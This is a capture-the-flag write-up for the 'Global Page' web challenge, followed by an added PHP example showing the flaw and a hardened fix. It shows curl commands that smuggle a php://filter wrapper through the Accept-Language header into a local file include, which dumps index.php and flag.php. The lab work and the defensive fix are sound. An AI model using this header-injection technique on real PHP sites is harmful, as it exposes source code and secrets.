Global Page
Problem
This problem is not available now.
[09/03 01:14 +00:00] fixed.
Welcome to TokyoWesterns' CTF!
Flag
shpik@shpik:/ctf/MMA/web/gap$ curl http://globalpage.chal.ctf.westerns.tokyo/?page=tokyo
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
direction: rtl;
}
</style>
</head>
<body>
<br />
<b>Notice</b>: Undefined index: HTTP_ACCEPT_LANGUAGE in <b>/var/www/globalpage/index.php</b> on line <b>36</b><br />
<p>
<br />
<b>Warning</b>: include(tokyo/.php): failed to open stream: No such file or directory in <b>/var/www/globalpage/index.php</b> on line <b>41</b><br />
<br />
<b>Warning</b>: include(): Failed opening 'tokyo/.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in <b>/var/www/globalpage/index.php</b> on line <b>41</b><br />
</p>
</body>
</html>
HTTP_ACCEPT_LANGUAGE is the file name,
and page is the directory.
So I expect: include $page.'/'.'HEADER HTTP_ACCEPT_LANGUAGE's value'
shpik@shpik:/ctf/MMA/web/gap$ curl 'http://globalpage.chal.ctf.westerns.tokyo/?page=php:' -H "Accept-Language:/filter/convert.base64-encode/resource=index"
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
direction: rtl;
}
</style>
</head>
<body>
<p>
[base64-encoded source of index.php]</p>
</body>
</html>
Okay, I got index.php with php://filter!
<!-- index.php -->
<?php
if (!defined('INCLUDED_INDEX')) {
define('INCLUDED_INDEX', true);
ini_set('display_errors', 1);
include "flag.php";
?>
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>
<body>
<?php
$dir = "";
if(isset($_GET['page'])) {
    $dir = str_replace(['.', '/'], '', $_GET['page']);
}

if(empty($dir)) {
?>
<ul>
    <li><a href="/?page=tokyo">Tokyo</a></li>
    <li><del>Westerns</del></li>
    <li><a href="/?page=ctf">CTF</a></li>
</ul>
<?php
}
else {
    foreach(explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']) as $lang) {
        $l = trim(explode(";", $lang)[0]);
?>
<p<?=($l==='he')?" class=rtl":""?>>
<?php
        include "$dir/$l.php";
?>
</p>
<?php
    }
}
?>
</body>
</html>
<?php
}
?>
Maybe I can get flag.php's source to get the flag.
shpik@shpik:/ctf/MMA/web/gap$ curl 'http://globalpage.chal.ctf.westerns.tokyo/?page=php:' -H "Accept-Language:/filter/convert.base64-encode/resource=flag"
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
direction: rtl;
}
</style>
</head>
<body>
<p>
PD9waHAKJGZsYWcgPSAiVFdDVEZ7SV9mb3VuZF9zaW1wbGVfTEZJfSI7Cg==</p>
</body>
</html>
Flag is
[ TWCTF{I_found_simple_LFI} ]
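The include in index.php strips `.` and `/` from `page` only, so the unfiltered Accept-Language value can complete a `php://` wrapper URL. The following is an added example, not part of the original write-up or the challenge code, that puts that path construction beside a hardened form; the `PAGES` and `LANGS` allowlists and the function names are assumptions.

```php
<?php
// Added example: not the challenge's code. PAGES and LANGS are assumed allowlists.
const PAGES = ['tokyo', 'ctf'];
const LANGS = ['en', 'ja', 'he'];

// Mirrors how index.php builds its include targets: only $page is filtered.
function vulnerable_targets(string $page, string $acceptLanguage): array {
    $dir = str_replace(['.', '/'], '', $page);
    $targets = [];
    foreach (explode(',', $acceptLanguage) as $lang) {
        $l = trim(explode(';', $lang)[0]);
        $targets[] = "$dir/$l.php";   // "php:" + "/" + "/filter/..." forms a wrapper URL
    }
    return $targets;
}

// Hardened: both parts must match an allowlist exactly, and the resolved
// file must exist under $base before it is handed to include.
function safe_target(string $base, string $page, string $acceptLanguage): ?string {
    $root = realpath($base);
    if ($root === false || !in_array($page, PAGES, true)) {
        return null;
    }
    foreach (explode(',', $acceptLanguage) as $lang) {
        $l = strtolower(trim(explode(';', $lang)[0]));
        if (!in_array($l, LANGS, true)) {
            continue;                 // unknown language tag: skip, never include
        }
        $real = realpath("$root/$page/$l.php");
        if ($real !== false && strpos($real, $root . DIRECTORY_SEPARATOR) === 0) {
            return $real;
        }
    }
    return null;
}

// Constructed inputs: the header value used on this page, then a normal browser header.
$probe = '/filter/convert.base64-encode/resource=index';
print_r(vulnerable_targets('php:', $probe));
var_dump(safe_target(__DIR__, 'php:', $probe));
var_dump(safe_target(__DIR__, 'tokyo', 'ja,en;q=0.8'));
```

`safe_target` returns a path only when a matching translation file exists under the base directory, so the last call prints NULL unless `tokyo/ja.php` sits beside the script. Turning off `display_errors` also removes the warnings that revealed the include path in the first request.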